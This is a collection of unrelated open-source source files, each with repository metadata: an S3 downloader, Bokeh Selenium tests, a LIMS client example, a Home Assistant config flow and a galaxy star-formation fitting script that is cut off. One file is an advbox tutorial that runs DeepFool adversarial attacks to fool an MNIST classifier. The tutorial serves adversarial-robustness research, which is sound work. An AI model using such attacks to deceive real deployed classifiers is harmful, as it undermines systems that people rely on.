def run_twice(animal):
animal.run()
animal.run()
run_twice(Dog())
dog = Dog()
dog.run()
print(isinstance(dog, Dog))
print(isinstance(dog, Animal))
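# A further illustration: Cat defines no run() of its own, so it inherits
# Animal.run(), while run_twice() dispatches on the object actually passed in.
run_twice(Cat())  # prints 'Animal is Running...' twice
print(isinstance(Cat(), Animal))  # True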
| {
"content_hash": "9ddc84e40d624f0ea0f3f8c563da05c1",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 37,
"avg_line_length": 15.5,
"alnum_prop": 0.6129032258064516,
"repo_name": "KrisCheng/HackerPractice",
"id": "d9e2b2e887f133510965c8ae2e05c0876063ac63",
"size": "368",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python/oop/inherit.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "305"
},
{
"name": "HTML",
"bytes": "57696"
},
{
"name": "JavaScript",
"bytes": "83921"
},
{
"name": "Python",
"bytes": "18233"
}
],
"symlink_target": ""
} |
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
In order for this to work, the AWS credentials need to be set via environment variables!
Make sure to set following environment variables:
$ export AWS_ACCESS_KEY_ID=<Your AWS Access Key ID>
$ export AWS_SECRET_ACCESS_KEY=<Your AWS Secret Access Key>
"""
import argparse
from ConfigurationHandler import ConfigurationHandler
from libs3 import download, logger
from version import __version__
####################################################################
#
# FUNCTIONS
#
####################################################################
def parse_shell_parameters():
"""
Parse the provided shell parameters
"""
usage = '%(prog)s [-h, --help] [command]'
description = '%(prog)s AWS S3 SquashFS Image Downloader'
epilog = "And now you're in control!"
parser = argparse.ArgumentParser(description=description, epilog=epilog, usage=usage)
parser.add_argument('-v', '--version', action='version', version='%(prog)s ver.{0}'.format(__version__))
parser.add_argument('-o', '--output', action='store', help="Output file (under which to store the S3 object)",
required=True)
parser.add_argument('-k', '--key', action='store', help="The identifying key for this image in S3",
required=True)
parser.add_argument('-b', '--bucket', action='store', default=config.get('S3', 'bucket'),
help="A valid AWS S3 bucket (default: \"{0}\")".format(config.get('S3', 'bucket')))
log.debug("Shell arguments: {0}".format(parser.parse_args()))
return parser.parse_args()
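# Example invocation (hypothetical key, file and bucket names):
# python s3-image-download.py --key images/base.squashfs --output /tmp/base.squashfs --bucket my-bucket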
def main():
"""
Run the whole thing
"""
# Get the shell arguments
args = parse_shell_parameters()
# Transfer shell arguments to variables
destination_file = args.output
bucket = args.bucket
image_key = args.key
# Ok, all set! We can download the file ...
log.debug('Downloading with key: "{0}" from bucket: "{1}" to output file: "{2}" '.format(image_key, bucket,
destination_file))
download(destination_file, image_key, bucket)
return 0
####################################################################
#
# MAIN
#
####################################################################
if __name__ == "__main__":
log = logger.get_logger('s3-image-download')
config = ConfigurationHandler().read_configuration()
main()
| {
"content_hash": "336c91965ad6c2be41b9a3551fb0da13",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 114,
"avg_line_length": 35.4,
"alnum_prop": 0.6180163214061519,
"repo_name": "cloudControl/s3-image-load",
"id": "d60bcb09a195e49c81900fc677cd740b53d04953",
"size": "3210",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/s3-image-download.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "16214"
},
{
"name": "Shell",
"bytes": "2050"
}
],
"symlink_target": ""
} |
from __future__ import annotations # isort:skip
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
from time import sleep
# External imports
from selenium.webdriver.common.keys import Keys
# Bokeh imports
from bokeh.layouts import column
from bokeh.models import (
ColumnDataSource,
CustomJS,
DataTable,
TableColumn,
TextInput,
)
from tests.support.plugins.project import BokehModelPage
from tests.support.util.selenium import (
RECORD,
enter_text_in_element,
find_element_for,
get_table_row,
shift_click,
)
#-----------------------------------------------------------------------------
# Tests
#-----------------------------------------------------------------------------
pytest_plugins = (
"tests.support.plugins.project",
)
@pytest.mark.selenium
class Test_DataTableCopyPaste:
def test_single_row_copy(self, bokeh_model_page: BokehModelPage) -> None:
data = {'x': [1,2,3,4], 'y': [1,1,1,1], 'd': ['foo', 'bar', 'baz', 'quux']}
source = ColumnDataSource(data)
table = DataTable(columns=[
TableColumn(field="x", title="x"),
TableColumn(field="y", title="y"),
TableColumn(field="d", title="d"),
], source=source)
text_input = TextInput()
text_input.js_on_change('value', CustomJS(code=RECORD("value", "cb_obj.value")))
page = bokeh_model_page(column(table, text_input))
row = get_table_row(page.driver, table, 2)
row.click()
enter_text_in_element(page.driver, row, Keys.INSERT, mod=Keys.CONTROL, click=0, enter=False)
input_el = find_element_for(page.driver, text_input)
enter_text_in_element(page.driver, input_el, Keys.INSERT, mod=Keys.SHIFT, enter=False)
enter_text_in_element(page.driver, input_el, "")
sleep(0.5)
results = page.results
assert results['value'] == '1\t2\t1\tbar'
assert page.has_no_console_errors()
def test_single_row_copy_with_zero(self, bokeh_model_page: BokehModelPage) -> None:
data = {'x': [1,2,3,4], 'y': [0,0,0,0], 'd': ['foo', 'bar', 'baz', 'quux']}
source = ColumnDataSource(data)
table = DataTable(columns=[
TableColumn(field="x", title="x"),
TableColumn(field="y", title="y"),
TableColumn(field="d", title="d"),
], source=source)
text_input = TextInput()
text_input.js_on_change('value', CustomJS(code=RECORD("value", "cb_obj.value")))
page = bokeh_model_page(column(table, text_input))
row = get_table_row(page.driver, table, 2)
row.click()
enter_text_in_element(page.driver, row, Keys.INSERT, mod=Keys.CONTROL, click=0, enter=False)
input_el = find_element_for(page.driver, text_input)
enter_text_in_element(page.driver, input_el, Keys.INSERT, mod=Keys.SHIFT, enter=False)
enter_text_in_element(page.driver, input_el, "")
sleep(0.5)
results = page.results
assert results['value'] == '1\t2\t0\tbar'
assert page.has_no_console_errors()
def test_multi_row_copy(self, bokeh_model_page: BokehModelPage) -> None:
data = {'x': [1,2,3,4], 'y': [0,1,2,3], 'd': ['foo', 'bar', 'baz', 'quux']}
source = ColumnDataSource(data)
table = DataTable(columns=[
TableColumn(field="x", title="x"),
TableColumn(field="y", title="y"),
TableColumn(field="d", title="d"),
], source=source)
text_input = TextInput()
text_input.js_on_change('value', CustomJS(code=RECORD("value", "cb_obj.value")))
page = bokeh_model_page(column(table, text_input))
row = get_table_row(page.driver, table, 1)
row.click()
row = get_table_row(page.driver, table, 3)
shift_click(page.driver, row)
enter_text_in_element(page.driver, row, Keys.INSERT, mod=Keys.CONTROL, click=0, enter=False)
input_el = find_element_for(page.driver, text_input)
enter_text_in_element(page.driver, input_el, Keys.INSERT, mod=Keys.SHIFT, enter=False)
enter_text_in_element(page.driver, input_el, "")
results = page.results
# XXX (bev) these should be newlines with a TextAreaInput but TextAreaInput
# is not working in tests for some reason presently
assert results['value'] == '0\t1\t0\tfoo 1\t2\t1\tbar 2\t3\t2\tbaz'
assert page.has_no_console_errors()
| {
"content_hash": "236fcc16a84280c84bb08fd04cc37dc2",
"timestamp": "",
"source": "github",
"line_count": 136,
"max_line_length": 100,
"avg_line_length": 33.98529411764706,
"alnum_prop": 0.572263089571614,
"repo_name": "bokeh/bokeh",
"id": "40ba07e2112d8b8346c2edf6d5ba2f822aa902f9",
"size": "5142",
"binary": false,
"copies": "1",
"ref": "refs/heads/branch-3.1",
"path": "tests/integration/widgets/tables/test_copy_paste.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1884"
},
{
"name": "Dockerfile",
"bytes": "1924"
},
{
"name": "GLSL",
"bytes": "44696"
},
{
"name": "HTML",
"bytes": "53475"
},
{
"name": "JavaScript",
"bytes": "20301"
},
{
"name": "Less",
"bytes": "46376"
},
{
"name": "Python",
"bytes": "4475226"
},
{
"name": "Shell",
"bytes": "7673"
},
{
"name": "TypeScript",
"bytes": "3652153"
}
],
"symlink_target": ""
} |
"""Python interface to GenoLogics LIMS via its REST API.
Usage example: Get some projects.
Per Kraulis, Science for Life Laboratory, Stockholm, Sweden.
"""
import codecs
from genologics.lims import *
# Login parameters for connecting to a LIMS instance.
from genologics.config import BASEURI, USERNAME, PASSWORD
# Create the LIMS interface instance, and check the connection and version.
lims = Lims(BASEURI, USERNAME, PASSWORD)
lims.check_version()
# Get the list of all projects.
projects = lims.get_projects()
print len(projects), 'projects in total'
# Get the list of all projects opened since May 30th 2012.
day = '2012-05-30'
projects = lims.get_projects(open_date=day)
print len(projects), 'projects opened since', day
# Get the project with the specified LIMS id, and print some info.
project = Project(lims, id='P193')
print project, project.name, project.open_date, project.close_date
print ' UDFs:'
for key, value in project.udf.items():
if isinstance(value, unicode):
value = codecs.encode(value, 'UTF-8')
print ' ', key, '=', value
udt = project.udt
print ' UDT:', udt.udt
for key, value in udt.items():
if isinstance(value, unicode):
value = codecs.encode(value, 'UTF-8')
print ' ', key, '=', value
print ' files:'
for file in project.files:
print file.id
print file.content_location
print file.original_location
| {
"content_hash": "8780f0db7a50c8e6703bc7801037e32c",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 75,
"avg_line_length": 27.333333333333332,
"alnum_prop": 0.7116212338593975,
"repo_name": "jwhite007/genologics",
"id": "47c102e795458d376f9db5bdab7079ea5fd2cbe4",
"size": "1394",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "examples/get_projects.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "232163"
}
],
"symlink_target": ""
} |
"""
DeepFool tutorial on mnist using advbox tool.
Deepfool is a simple and accurate adversarial attack method.
It supports both targeted attack and non-targeted attack.
"""
import sys
sys.path.append("..")
import matplotlib.pyplot as plt
import paddle.fluid as fluid
import paddle.v2 as paddle
from advbox.adversary import Adversary
from advbox.attacks.deepfool import DeepFoolAttack
from advbox.models.paddle import PaddleModel
from tutorials.mnist_model import mnist_cnn_model
def main():
"""
Advbox demo which demonstrate how to use advbox.
"""
TOTAL_NUM = 500
IMG_NAME = 'img'
LABEL_NAME = 'label'
img = fluid.layers.data(name=IMG_NAME, shape=[1, 28, 28], dtype='float32')
# gradient should flow
img.stop_gradient = False
label = fluid.layers.data(name=LABEL_NAME, shape=[1], dtype='int64')
logits = mnist_cnn_model(img)
cost = fluid.layers.cross_entropy(input=logits, label=label)
avg_cost = fluid.layers.mean(x=cost)
# use CPU
place = fluid.CPUPlace()
# use GPU
# place = fluid.CUDAPlace(0)
exe = fluid.Executor(place)
BATCH_SIZE = 1
train_reader = paddle.batch(
paddle.reader.shuffle(
paddle.dataset.mnist.train(), buf_size=128 * 10),
batch_size=BATCH_SIZE)
test_reader = paddle.batch(
paddle.reader.shuffle(
paddle.dataset.mnist.test(), buf_size=128 * 10),
batch_size=BATCH_SIZE)
fluid.io.load_params(
exe, "./mnist/", main_program=fluid.default_main_program())
# advbox demo
m = PaddleModel(
fluid.default_main_program(),
IMG_NAME,
LABEL_NAME,
logits.name,
avg_cost.name, (-1, 1),
channel_axis=1)
attack = DeepFoolAttack(m)
attack_config = {"iterations": 100, "overshoot": 9}
# use train data to generate adversarial examples
total_count = 0
fooling_count = 0
for data in train_reader():
total_count += 1
adversary = Adversary(data[0][0], data[0][1])
# DeepFool non-targeted attack
adversary = attack(adversary, **attack_config)
# DeepFool targeted attack
# tlabel = 0
# adversary.set_target(is_targeted_attack=True, target_label=tlabel)
# adversary = attack(adversary, **attack_config)
if adversary.is_successful():
fooling_count += 1
print(
'attack success, original_label=%d, adversarial_label=%d, count=%d'
% (data[0][1], adversary.adversarial_label, total_count))
# plt.imshow(adversary.target, cmap='Greys_r')
# plt.show()
# np.save('adv_img', adversary.target)
else:
print('attack failed, original_label=%d, count=%d' %
(data[0][1], total_count))
if total_count >= TOTAL_NUM:
print(
"[TRAIN_DATASET]: fooling_count=%d, total_count=%d, fooling_rate=%f"
% (fooling_count, total_count,
float(fooling_count) / total_count))
break
# use test data to generate adversarial examples
total_count = 0
fooling_count = 0
for data in test_reader():
total_count += 1
adversary = Adversary(data[0][0], data[0][1])
# DeepFool non-targeted attack
adversary = attack(adversary, **attack_config)
# DeepFool targeted attack
# tlabel = 0
# adversary.set_target(is_targeted_attack=True, target_label=tlabel)
# adversary = attack(adversary, **attack_config)
if adversary.is_successful():
fooling_count += 1
print(
'attack success, original_label=%d, adversarial_label=%d, count=%d'
% (data[0][1], adversary.adversarial_label, total_count))
# plt.imshow(adversary.target, cmap='Greys_r')
# plt.show()
# np.save('adv_img', adversary.target)
else:
print('attack failed, original_label=%d, count=%d' %
(data[0][1], total_count))
if total_count >= TOTAL_NUM:
print(
"[TEST_DATASET]: fooling_count=%d, total_count=%d, fooling_rate=%f"
% (fooling_count, total_count,
float(fooling_count) / total_count))
break
    print("deepfool attack done")
if __name__ == '__main__':
main()
| {
"content_hash": "5b0ece1e4e0c9232484bf8404999d9dc",
"timestamp": "",
"source": "github",
"line_count": 137,
"max_line_length": 84,
"avg_line_length": 32.175182481751825,
"alnum_prop": 0.5905172413793104,
"repo_name": "qingqing01/models",
"id": "2b12c81945859b42809e33ccd74ead53f4d4eb05",
"size": "4408",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "fluid/adversarial/tutorials/mnist_tutorial_deepfool.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "15149"
},
{
"name": "Python",
"bytes": "1397018"
},
{
"name": "Shell",
"bytes": "24648"
}
],
"symlink_target": ""
} |
import mysql.connector
import send_to_db
from os.path import join, dirname
import json
def main(config):
    output = []
    db = mysql.connector.Connect(**config)
    cursor = db.cursor()
    stmts = ["SELECT * FROM top_cities(cities)"]
    for stmt in stmts:
        cursor.execute(stmt)
        output.extend(cursor.fetchall())
    with open('top_cities.txt', 'w') as file:
        for item in output:
            file.write(str(item))
            file.write('\n')
    cursor.close()
    db.close()
    return output
if __name__ == '__main__':
config = {
'host': 'localhost',
'port': 3306,
'database': 'udest',
'user': 'root',
'password': '',
'charset': 'utf8',
'use_unicode': True,
'get_warnings': True,
}
#out = main(config)
#print('\n'.join(out))
send_to_db.main(config) | {
"content_hash": "358de27d6a75497f58042177753760ca",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 48,
"avg_line_length": 21.303030303030305,
"alnum_prop": 0.5533428165007113,
"repo_name": "jpmunic/udest",
"id": "1adc6b101bcdea07ecaf652931c0c717ec2d01c4",
"size": "703",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/watson_receive_from_db.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "77582"
},
{
"name": "JavaScript",
"bytes": "43347"
},
{
"name": "PHP",
"bytes": "17162"
},
{
"name": "Python",
"bytes": "62795"
}
],
"symlink_target": ""
} |
"""Config flow to configure demo component."""
from homeassistant import config_entries
# pylint: disable=unused-import
from . import DOMAIN
class DemoConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Demo configuration flow."""
VERSION = 1
async def async_step_import(self, import_info):
"""Set the config entry up from yaml."""
return self.async_create_entry(title="Demo", data={})
| {
"content_hash": "7eb34d19c05959ac0d84fc173367cef5",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 63,
"avg_line_length": 26.5625,
"alnum_prop": 0.6988235294117647,
"repo_name": "Teagan42/home-assistant",
"id": "e6b275920c8c16ea0f4dd2d3ddeadaf3fb35ce34",
"size": "425",
"binary": false,
"copies": "4",
"ref": "refs/heads/dev",
"path": "homeassistant/components/demo/config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "19774313"
},
{
"name": "Shell",
"bytes": "6846"
}
],
"symlink_target": ""
} |
""" A fantastic python code to determine the quenched SFH parameters of galaxies using emcee (http://dan.iel.fm/emcee/current/). This file contains all the functions needed to determine the mean SFH parameters of a population.
N.B. The data files .ised_ASCII contain the extracted bc03 models and have a 0 in the origin at [0,0]. The first row contains the model ages (from the second column) - data[0,1:]. The first column contains the model lambda values (from the second row) - data[1:,0]. The remaining data[1:,1:] are the flux values at each of the ages (columns, x) and lambda (rows, y) values
"""
import numpy as N
import scipy as S
import pylab as P
import pyfits as F
from scipy.io.idl import readsav
import pyfits as F
import emcee
import triangle
import time
import os
import matplotlib.image as mpimg
from astropy.cosmology import FlatLambdaCDM
from scipy.stats import kde
from scipy.interpolate import LinearNDInterpolator
from scipy.interpolate import interp2d
from itertools import product
import sys
cosmo = FlatLambdaCDM(H0 = 71.0, Om0 = 0.26)
font = {'family':'serif', 'size':16}
P.rc('font', **font)
P.rc('xtick', labelsize='medium')
P.rc('ytick', labelsize='medium')
P.rc('axes', labelsize='medium')
method = raw_input('Do you wish to use a look-up table? (yes/no) :')
if method == 'yes' or method =='y':
prov = raw_input('Do you wish to use the provided u-r and NUV-u look up tables? (yes/no) :')
if prov == 'yes' or prov =='y':
print 'gridding...'
tq = N.linspace(0.003, 13.8, 100)
tau = N.linspace(0.003, 4, 100)
ages = N.linspace(10.88861228, 13.67023409, 50)
grid = N.array(list(product(ages, tau, tq)))
print 'loading...'
nuv_pred = N.load('nuv_look_up_ssfr.npy')
ur_pred = N.load('ur_look_up_ssfr.npy')
lu = N.append(nuv_pred.reshape(-1,1), ur_pred.reshape(-1,1), axis=1)
elif prov=='no' or prov=='n':
col1 = str(raw_input('Location of your NUV-u colour look up table :'))
col2 = str(raw_input('Location of your u-r colour look up table :'))
one = N.array(input('Define first axis values (ages) of look up table start, stop, len(axis1); e.g. 10, 13.8, 50 :'))
ages = N.linspace(float(one[0]), float(one[1]), float(one[2]))
two = N.array(input('Define second axis values (tau) of look up table start, stop, len(axis1); e.g. 0, 4, 100 : '))
tau = N.linspace(float(two[0]), float(two[1]), float(two[2]))
three = N.array(input('Define third axis values (tq) of look up table start, stop, len(axis1); e.g. 0, 13.8, 100 : '))
tq = N.linspace(float(three[0]), float(three[1]), float(three[2]))
grid = N.array(list(product(ages, tau, tq)))
print 'loading...'
nuv_pred = N.load(col1)
ur_pred = N.load(col2)
lu = N.append(nuv_pred.reshape(-1,1), ur_pred.reshape(-1,1), axis=1)
else:
sys.exit("You didn't give a valid answer (yes/no). Try running again.")
def lnlike_one(theta, ur, sigma_ur, nuvu, sigma_nuvu, age):
""" Function for determining the likelihood of ONE quenching model described by theta = [tq, tau] for all the galaxies in the sample. Simple chi squared likelihood between predicted and observed colours of the galaxies.
:theta:
An array of size (1,2) containing the values [tq, tau] in Gyr.
:tq:
The time at which the onset of quenching begins in Gyr. Allowed ranges from the beginning to the end of known cosmic time.
:tau:
The exponential timescale decay rate of the star formation history in Gyr. Allowed range from the rest of the functions is 0 < tau [Gyr] < 5.
:ur:
Observed u-r colour of a galaxy; k-corrected.
:sigma_ur:
Error on the observed u-r colour of a galaxy
:nuvu:
Observed nuv-u colour of a galaxy; k-corrected.
:sigma_nuvu:
Error on the observed nuv-u colour of a galaxy
:age:
Observed age of a galaxy, often calculated from the redshift i.e. at z=0.1 the age ~ 12.5. Must be in units of Gyr.
RETURNS:
Array of same shape as :age: containing the likelihood for each galaxy at the given :theta:
"""
tq, tau = theta
pred_nuvu, pred_ur = lookup_col_one(theta, age)
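        # The return value is the sum of two independent Gaussian log-likelihoods,
        # ln L = -0.5*ln(2*pi*sigma**2) - 0.5*(observed - predicted)**2 / sigma**2,
        # one term for the u-r colour and one for the NUV-u colour.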
        return -0.5*N.log(2*N.pi*sigma_ur**2)-0.5*((ur-pred_ur)**2/sigma_ur**2)-0.5*N.log(2*N.pi*sigma_nuvu**2)-0.5*((nuvu-pred_nuvu)**2/sigma_nuvu**2)
elif method == 'no' or method =='n':
"""We first define the directory in which we will find the BC03 model, extracted from the original files downloaded from the BC03 website into a usable format. Here we implement a solar metallicity model with a Chabrier IMF."""
model = str(raw_input('Location of the extracted (.ised_ASCII) SPS model to use to predict the u-r and NUV-u colours, e.g. ~/extracted_bc2003_lr_m62_chab_ssp.ised_ASCII :'))
data = N.loadtxt(model)
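    # Layout of the extracted .ised_ASCII array (see the module docstring):
    # data[0, 1:] -> model ages, data[1:, 0] -> model wavelengths (lambda),
    # data[1:, 1:] -> fluxes, i.e. data[1 + i, 1 + j] is the flux at wavelength
    # data[1 + i, 0] for the age data[0, 1 + j].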
import fluxes
def lnlike_one(theta, ur, sigma_ur, nuvu, sigma_nuvu, age):
""" Function for determining the likelihood of ONE quenching model described by theta = [tq, tau] for all the galaxies in the sample. Simple chi squared likelihood between predicted and observed colours of the galaxies.
:theta:
An array of size (1,2) containing the values [tq, tau] in Gyr.
:tq:
The time at which the onset of quenching begins in Gyr. Allowed ranges from the beginning to the end of known cosmic time.
:tau:
The exponential timescale decay rate of the star formation history in Gyr. Allowed range from the rest of the functions is 0 < tau [Gyr] < 5.
:ur:
Observed u-r colour of a galaxy; k-corrected.
:sigma_ur:
Error on the observed u-r colour of a galaxy
:nuvu:
Observed nuv-u colour of a galaxy; k-corrected.
:sigma_nuvu:
Error on the observed nuv-u colour of a galaxy
:age:
Observed age of a galaxy, often calculated from the redshift i.e. at z=0.1 the age ~ 12.5. Must be in units of Gyr.
RETURNS:
Array of same shape as :age: containing the likelihood for each galaxy at the given :theta:
"""
tq, tau = theta
pred_nuvu, pred_ur = predict_c_one(theta, age)
        return -0.5*N.log(2*N.pi*sigma_ur**2)-0.5*((ur-pred_ur)**2/sigma_ur**2)-0.5*N.log(2*N.pi*sigma_nuvu**2)-0.5*((nuvu-pred_nuvu)**2/sigma_nuvu**2)
else:
sys.exit("You didn't give a valid answer (yes/no). Try running again.")
n=0
def expsfh(tq, tau, time):
    """ This function, when given a single combination of [tq, tau] values, will calculate the SFR at all times. First calculate the sSFR at all times as defined by Peng et al. (2010), then the SFR at the specified time of quenching, tq, and set the SFR to this value at all times before tq. Beyond this time the SFR is an exponentially declining function with timescale tau.
INPUT:
:tau:
The exponential timescale decay rate of the star formation history in Gyr. Allowed range from the rest of the functions is 0 < tau [Gyr] < 5.
:tq:
The time at which the onset of quenching begins in Gyr. Allowed ranges from the beginning to the end of known cosmic time.
:time:
        An array of time values at which the SFR is calculated at each step.
RETURNS:
:sfr:
Array of the same dimensions of time containing the sfr at each timestep.
"""
ssfr = 2.5*(((10**10.27)/1E10)**(-0.1))*(time/3.5)**(-2.2)
c = time.searchsorted(3.0)
ssfr[:c] = N.interp(3.0, time, ssfr)
c_sfr = N.interp(tq, time, ssfr)*(1E10)/(1E9)
### definition is for 10^10 M_solar galaxies and per gyr - convert to M_solar/year ###
a = time.searchsorted(tq)
sfr = N.ones(len(time))*c_sfr
sfr[a:] = c_sfr*N.exp(-(time[a:]-tq)/tau)
return sfr
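# Usage sketch (hypothetical parameters): a galaxy quenched at tq = 7.0 Gyr with
# tau = 1.0 Gyr has a constant SFR up to 7 Gyr and an exponential decline
# afterwards, e.g. sfr = expsfh(7.0, 1.0, N.linspace(0.003, 13.8, 200))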
def expsfh_mass(ur, Mr, age, tq, tau, time):
    """Calculate exponentially declining star formation rates at each input time step by matching to the mass of the observed galaxy at the observed time. This is calculated from the mass-to-light ratio, which is a function of the u-r colour as in Baldry et al. (2006; see Figure 5), who fit to data from Glazebrook et al. (2004) and Kauffmann et al. (2003).
INPUT:
:ur:
u-r optical colour, needed to calculate the mass of the observed galaxy
:Mr:
Absolute r-band magnitude, needed to calculate the mass of the observed galaxy
:age:
Observed age of a galaxy, often calculated from the redshift i.e. at z=0.1 the age ~ 12.5. Must be in units of Gyr.
:tq:
The time at which the onset of quenching begins in Gyr. Allowed ranges from the beginning to the end of known cosmic time.
:tau:
The exponential timescale decay rate of the star formation history in Gyr. Allowed range from the rest of the functions is 0 < tau [Gyr] < 5.
:time:
An array of time values at which the SFR is calcualted at each step.
RETURNS:
:sfr:
Array of the same dimensions of time containing the sfr at each timestep.
"""
    t_end = age # time up to which to integrate under the exponential curve to obtain the final mass
if ur <=2.1:
log_m_l = -0.95 + 0.56 * ur
else:
log_m_l = -0.16 + 0.18 * ur
m_msun = 10**(((4.62 - Mr)/2.5) + log_m_l)
print 'Mass [M_solar]', m_msun
c_sfr = (m_msun/(tq + tau*(1 - N.exp((tq - t_end)/tau)))) / 1E9
a = time.searchsorted(tq)
sfr = N.ones(len(time))*c_sfr
sfr[a:] = c_sfr*N.exp(-(time[a:]-tq)/tau)
return sfr
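# Worked example (hypothetical galaxy): ur = 1.5 and Mr = -20.5 give
# log_m_l = -0.95 + 0.56*1.5 = -0.11 and
# m_msun = 10**((4.62 + 20.5)/2.5 - 0.11) = 10**9.938, roughly 8.7e9 M_solar,
# which sets the normalisation c_sfr of the exponential SFH.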
def predict_c_one(theta, age):
    """ This function predicts the u-r and nuv-u colours of a galaxy with a SFH defined by [tq, tau], according to the BC03 model at a given "age" i.e. observation time. It calculates the colours at all times then interpolates for the observed age - it has to do this in order to work out the cumulative mass across the SFH to determine how much each population of stars contributes to the flux at each time step.
:theta:
An array of size (1,2) containing the values [tq, tau] in Gyr.
:tq:
The time at which the onset of quenching begins in Gyr. Allowed ranges from the beginning to the end of known cosmic time.
:tau:
The exponential timescale decay rate of the star formation history in Gyr. Allowed range from the rest of the functions is 0 < tau [Gyr] < 5.
:age:
Observed age of a galaxy, often calculated from the redshift i.e. at z=0.1 the age ~ 12.5. Must be in units of Gyr.
RETURNS:
:nuv_u_age:
Array the same shape as :age: with the nuv-u colour values at each given age for the specified :theta: values
:u_r_age:
Array the same shape as :age: with the u-r colour values at each given age for the specified :theta: values
"""
ti = N.arange(0, 0.01, 0.003)
t = N.linspace(0,14.0,100)
t = N.append(ti, t[1:])
tq, tau = theta
sfr = expsfh(tq, tau, t)
### Work out total flux at each time given the sfh model of tau and tq (calls fluxes function) ###
total_flux = fluxes.assign_total_flux(data[0,1:], data[1:,0], data[1:,1:], t*1E9, sfr)
### Calculate fluxes from the flux at all times then interpolate to get one colour for the age you are observing the galaxy at - if many galaxies are being observed, this also works with an array of ages to give back an array of colours ###
nuv_u, u_r = get_colours(t*1E9, total_flux, data)
nuv_u_age = N.interp(age, t, nuv_u)
u_r_age = N.interp(age, t, u_r)
return nuv_u_age, u_r_age
def get_colours(time, flux, data):
    """ Calculates the colours across time of a given SFH's fluxes, given the BC03 models, from the magnitudes of the SED.
:time:
Array of times at which the colours should be calculated. In units of Gyrs.
:flux:
SED of fluxes describing the calcualted SFH. Returned from the assign_total_flux function in fluxes.py
:data:
BC03 model values for wavelengths, time steps and fluxes. The wavelengths are needed to calculate the magnitudes.
RETURNS:
:nuv_u: :u_r:
Arrays the same shape as :time: with the predicted nuv-u and u-r colours
"""
nuvmag = fluxes.calculate_AB_mag(time, data[1:,0], flux, nuvwave, nuvtrans)
umag = fluxes.calculate_AB_mag(time, data[1:,0], flux, uwave, utrans)
rmag = fluxes.calculate_AB_mag(time, data[1:,0], flux, rwave, rtrans)
nuv_u = nuvmag - umag
u_r = umag - rmag
return nuv_u, u_r
def lookup_col_one(theta, age):
ur_pred = u(theta[0], theta[1])
nuv_pred = v(theta[0], theta[1])
return nuv_pred, ur_pred
# Prior likelihood on theta values given the inital w values assumed for the mean and stdev
def lnprior(theta):
    """ Function to calculate the prior likelihood on theta values given the initial w values assumed for the mean and standard deviation of the tq and tau parameters. Defined ranges are specified - outside these ranges the function returns -N.inf and does not calculate the posterior probability.
    :theta:
        An array of size (1,2) containing the values [tq, tau] in Gyr.
        :tq:
        The time at which the onset of quenching begins in Gyr. Allowed ranges from the beginning to the end of known cosmic time.
        :tau:
        The exponential timescale decay rate of the star formation history in Gyr. Allowed range from the rest of the functions is 0 < tau [Gyr] < 5.
RETURNS:
Value of the prior at the specified :theta: value.
"""
tq, tau = theta
if 0.003 <= tq <= 13.807108309208775 and 0.003 <= tau <= 4.0:
return 0.0
else:
return -N.inf
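# For example, lnprior([7.0, 1.0]) returns 0.0 (a flat prior inside the allowed
# ranges) while lnprior([15.0, 1.0]) returns -N.inf, so the likelihood is never
# evaluated for such a step.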
# Overall likelihood function combining prior and model
def lnprob(theta, ur, sigma_ur, nuvu, sigma_nuvu, age):
    """Overall posterior function combining the prior and calculating the likelihood. Also prints out the progress through the code with the use of n.
    :theta:
        An array of size (1,2) containing the values [tq, tau] in Gyr.
        :tq:
        The time at which the onset of quenching begins in Gyr. Allowed ranges from the beginning to the end of known cosmic time.
        :tau:
        The exponential timescale decay rate of the star formation history in Gyr. Allowed range from the rest of the functions is 0 < tau [Gyr] < 5.
:ur:
Observed u-r colour of a galaxy; k-corrected. An array of shape (N,1) or (N,).
:sigma_ur:
Error on the observed u-r colour of a galaxy. An array of shape (N,1) or (N,).
:nuvu:
Observed nuv-u colour of a galaxy; k-corrected. An array of shape (N,1) or (N,).
:sigma_nuvu:
Error on the observed nuv-u colour of a galaxy. An array of shape (N,1) or (N,).
:age:
Observed age of a galaxy, often calculated from the redshift i.e. at z=0.1 the age ~ 12.5. Must be in units of Gyr. An array of shape (N,1) or (N,).
RETURNS:
Value of the posterior function for the given :theta: value.
"""
global n
n+=1
if n %100 == 0:
print 'step number', n/100
lp = lnprior(theta)
if not N.isfinite(lp):
return -N.inf
return lp + lnlike_one(theta, ur, sigma_ur, nuvu, sigma_nuvu, age)
def sample(ndim, nwalkers, nsteps, burnin, start, ur, sigma_ur, nuvu, sigma_nuvu, age, id, ra, dec):
    """ Function to implement the emcee EnsembleSampler function for the sample of galaxies input. Burn-in is run and calculated for the length specified before the sampler is reset and then run for the number of steps specified.
